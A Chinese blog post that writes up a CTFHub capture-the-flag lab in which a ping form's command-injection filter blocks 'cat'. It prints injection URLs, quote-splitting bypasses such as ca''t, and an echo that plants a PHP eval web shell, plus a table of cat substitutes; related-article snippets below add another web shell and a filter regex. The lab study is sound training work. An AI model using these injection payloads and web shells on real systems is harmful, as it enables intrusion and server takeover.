CTFHub | 过滤cat

最新推荐文章于 2024-07-17 09:45:19 发布
最新推荐文章于 2024-07-17 09:45:19 发布
阅读量733 收藏
点赞数
分类专栏: CTF精进之路 文章标签: web安全 CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51191308/article/details/131265376
版权

0x00 前言

        CTFHub 专注网络安全、信息安全、白帽子技术的在线学习,实训平台。提供优质的赛事及学习服务,拥有完善的题目环境及配套 writeup ,降低 CTF 学习入门门槛,快速帮助选手成长,跟随主流比赛潮流。

        

        

0x01 题目描述

过滤cat:

        过滤了 cat 命令之后,你还有什么方法能读到 Flag ?

网页显示内容

        

        

0x02 解题过程

0x1 方法一:命令注入

在目标 IP 输入框中输入 IP 并点击 Ping 按钮, Ping 一下试试。页面正常回显。

        

和前文方法一样,使用管道符执行注入。发现一个 flag 的可疑文件。

http://challenge-46d97d2b266146c3.sandbox.ctfhub.com:10800/?ip=127.0.0.1|ls

        

因为在代码中可以看到,网页对 cat 命令做了过滤处理。那么这题我们无法使用 cat 命令执行注入。当然,在 linux 中还有很多方法可以替代 cat 命令。例如 awk 命令,(详细介绍将在后文做出解释)使用 awk 命令访问 flag 文件夹,和之前的题目一样,网页无回显。检查网页源代码发现此题 flag 。

http://challenge-46d97d2b266146c3.sandbox.ctfhub.com:10800/?ip=127.0.0.1|awk '{print}' flag_57691538432265.php

        

0x2 方法二:连接符

直接使用连接符绕过网页过滤,查看网页源代码发现此题 flag 。

[1]. ca''t flag_25860318366859.php
[2]. ca\t flag_25860318366859.php

        

0x3 方法三:构造Payload

直接在搜索框中上传一句话木马。

127.0.0.1 &echo "<?php @eval(\$_POST['CTFHub']);?>" >> shell.php

        

打开蚁剑测试连通性,可以正常连接。

         

检查网页目录,在 flag 目录中发现此题 flag 。

         

        

0x03 过滤方法

        除了 cat 命令,在 linux 中还有很多命令可以替代,也为渗透测试提供了很多手法,这里介绍几个常见的命令。

命令描述示例
more逐屏显示内容,按空格向下翻页,按q退出 
more flag_25860318366859.php
less逐屏显示内容,支持搜索、向前/向后翻页等 
less flag_25860318366859.php
head显示文件的前几行,默认为前10行 
head flag_25860318366859.php
tail显示文件的后几行,默认为最后10行 
tail flag_25860318366859.php
tac反向显示文件内容,即从最后一行开始显示,直到第一行 
tac flag_25860318366859.php
nl给文件添加行号,可以与cat命令结合使用 
cat  flag_25860318366859.php | n1
awk处理文本文件中的数据,并按照指定的格式输出 
awk '{print}' flag_25860318366859.php

         

        

0x04 参考文献

[1].runoob. Linux 手册[EB/OL]. [2023-06-18]. https://www.runoob.com/linux/linux-tutorial.html.

        

        

0x05 总结

文章内容为学习记录的笔记,由于作者水平有限,文中若有错误与不足欢迎留言,便于及时更正。

尼泊罗河伯
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Web-CTF-Cheatsheet:Web CTF速查表:cat:
04-29
WEB CTF备忘单 目录 MySQL 微软SQL Oracle SQLite的 PostgreSQL MS Access LFI 上载 序列化 PHP序列化 Python泡菜 Ruby元帅 Ruby YAML Java序列化 .NET序列化 SSTI / CSTI Flask / Jinja2 嫩枝/ Symfony 胸腺 AngularJS Vue.js Python 工具 SSRF 旁路 本地曝光 远程曝光 元数据 CRLF注射 指纹图 XXE 带外XXE 基于错误的XXE 原型污染 前端 XSS RPO CSS注入 XS泄漏 DOM破坏 加密货币 液化天然气 ECB模式 CBC模式 长度扩展攻击 其他 工具和网站 信息收集 散列裂纹 网页外壳 PHP Webshel​​l <?php system ( $ _GET [ "cmd" ]);
CTFHub技能树笔记之RCE:命令注入、过滤cat过滤空格
weixin_48799157的博客
03-28 8729
小白一个,记录解题过程,如有错误请指正! 一、命令注入 补充知识点: 命令行注入漏洞是指web应用程序中调用了系统可执行命令的函数,而且输入参数是可控的,如果黑客拼接了注入命令,就可以进行非法操作了。 Windows系统支持的管道符如下: 1. “|”:直接执行后面的语句。 2. “||”:如果前面的语句执行失败,则执行后面的语句,前面的语句只能为假才行。 3. “&”:两条命令都执行,如果前面的语句为假则直接执行后面的语句,前面的语句可真可假。 4. “&&...
CTFHUB-技能树-Web题-RCE(远程代码执行)-远程包含-命令注入-过滤cat
最新发布
Static______的博客
07-17 180
过滤cat就是找个能代替的。
命令注入————ctfhub过滤cat、空格、目录分隔符、运算符、综合过滤练习)
qq_45655564的博客
05-30 9064
CTFHub 命令注入-过滤cat <?php $res = FALSE; if (isset($_GET['ip']) && $_GET['ip']) { $ip = $_GET['ip']; $m = []; if (!preg_match_all("/cat/", $ip, $m)) { $cmd = "ping -c 4 {$ip}"; exec($cmd, $res); } else { $r
[CTF题目总结-web篇]攻防世界:Cat
T2hunz1
01-10 3960
[CTF题目总结-web篇]攻防世界:Cat
CTFHub-Web-RCE-命令注入
qq_54037445的博客
11-29 2284
1、常见的拼接符1、A;B 先执行A,再执行B2、A & B 简单的拼接3、A | B 显示B的执行结果4、A&&B A执行成功之后才会执行B5、A || B A执行失败之后才会执行B, 在特殊情况下可代替空格2、常见的命令1.type 显示文本文件内容type x:\1.txt //显示x盘下的1.txt文件内容。
CtfHub-wp(web
01-23
此外,使用`dirsearch`工具扫描网站以寻找可能的备份文件,如`.bak`文件,然后使用`cat`命令查看其内容以获取flag。 接着,文章提到了Vim编辑器的缓存文件`.index.php.swp`,这种非正常关闭Vim时产生的文件可以用来...
PyPI 官网下载 | dbcat-0.5.5.tar.gz
01-27
标题中的"PyPI 官网下载 | dbcat-0.5.5.tar.gz"表明这是一个在Python Package Index(PyPI)上发布的软件包,名为`dbcat`,版本为0.5.5,且文件格式为tar.gz。PyPI是Python开发者发布自己编写的开源软件包的一个官方...
Python库 | KeyCat-0.1.3.tar.gz
03-08
《Python库探索:KeyCat-0.1.3.tar.gz深度解析》 在信息技术日新月异的时代,Python作为一门强大且易学的编程语言,已经成为了开发者的首选工具之一。今天,我们要深入探讨的是一款名为KeyCat的Python库,其版本为...
Python库 | dbcat-0.9.0-py3-none-any.whl
02-17
**Python库dbcat-0.9.0-py3-none-any.whl详解** 在Python的开发环境中,库扮演着至关重要的角色,它们提供了丰富的功能,让开发者能够更高效地完成各种任务。`dbcat`是一个Python库,它专注于数据管理和查询,特别...
CTFHub 命令注入-过滤cat
At0m的博客
01-14 3258
CTFHub 命令注入-过滤cat 第一还是看源码,首先是肯定是过滤cat关键字,虽然看不太懂,但是才也是这样啊嘻嘻。 但是preg_match_all有三个参数,看一下,这三个参数分别是干什么的: <?php $userinfo = "Name: <b>PHP</b> <br> Title: <b>Programming Language</b>"; preg_match_all ("/<b>(.*)<\/b>/
cat命令过滤查看文档
mengqingming1的博客
04-09 3407
cat命令可以直接查看整个文档 cat nginx.conf | grep -v “#” | grep -v “^$” grep -v “#” 过滤掉 #开头的注释部分 grep -v “^$” 过滤掉空格换行
命令执行各种绕过总结
m0_64815693的博客
10-11 8996
最近做了题目很多都有命令执行的,这里给自己做一次总结,也给大家一个参考,有各种绕过,十分的详细哦
【网络安全 | CTFcatcat-new
等风来
12-25 2146
读取了/proc/self/maps获得了应用运行的内存映射信息,接下来的思路就是:读取/proc/self/mem获得当前内存的详细信息,由于在app.py的info()方法从HTTP请求中接收了start和end参数,即可传参,从而读取任意文件中任意两个地址之间的数据,最后使用正则表达式匹配字符串\w+{\w+}直接获取flag
cat/tac查询命令
mingyqf的博客
04-10 861
ctf 常用查询文件命令 cat tac cat<xxx.php tac<xxx.php
ctfhub——命令行注入
m0_75007575的博客
04-05 368
这段代码首先检查是否存在名为ip的GET参数,并且该参数的值不为空。如果满足条件,将获取GET参数ip的值赋给变量$ip。接着,创建一个空数组$m,然后通过正则表达式preg_match_all("/\//", $ip, $m)来检查$ip中是否包含斜杠/。如果$ip中包含斜杠,则直接将匹配结果存储在数组$res中。既然不能使用目录分隔符,那我们就先进入目录再去查看文件。打开控制台发现代码里面出现了flag,即通过成功。运算符都被过滤掉了,我们也可以使用;回显空白,得到flag。回显空白,得到flag。
Linux cat命令过滤#和空白行
GADIOYOUNGE的博客
09-08 2859
cat /opt/xxxxxx.txt|grep -vE '^$|#'
CTF之一天一题:攻防世界的web进阶之Cat
qq_42728977的博客
08-27 1570
这个题做的还是太明白,看了许多wp。在此小记录一下。 题目这个鸭子,看到以为是sql注入,但又看是输入域名,然后返回ping的结果,又像是命令执行漏洞,于是各种姿势试,无果。开始看wp。 大佬们是先fuzz一波,发现当url=@的时候报错,而@的的url编码是%80, ...
文件查询时
qq_50613938的博客
11-03 326
无限制文件查询的时候,直接使用ls查看当前全部文件就可以进行访问 而这里因为查询语句的存在,我们其实是进行的一个多重访问的并发过程,所以我们需要用;或者|或者&这种管道命令分割符进行控制并发处理,字符型注入大可–+’或者#填充 当cat过滤 过滤cat 127.0.0.1&echo -e “<?php @eval(\$_POST['test']);?>” > 555.php 可以绕过要是一个很长的文件名可以试试直接用通配符来把它直接通配,这样就可以了 当cat过滤时,.
if (!preg_match_all("/(\||&|;| |\/|cat|flag|ctfhub)/", $ip, $m))
09-20
这段代码可以用于对IP地址进行过滤,判断是否包含一些不安全的字符或命令。它使用正则表达式 `preg_...`、空格、`/`、`cat`、`flag` 或 `ctfhub` 这些关键字。如果匹配成功,则返回过滤出的字符串,否则返回 `false`。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

尼泊罗河伯

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值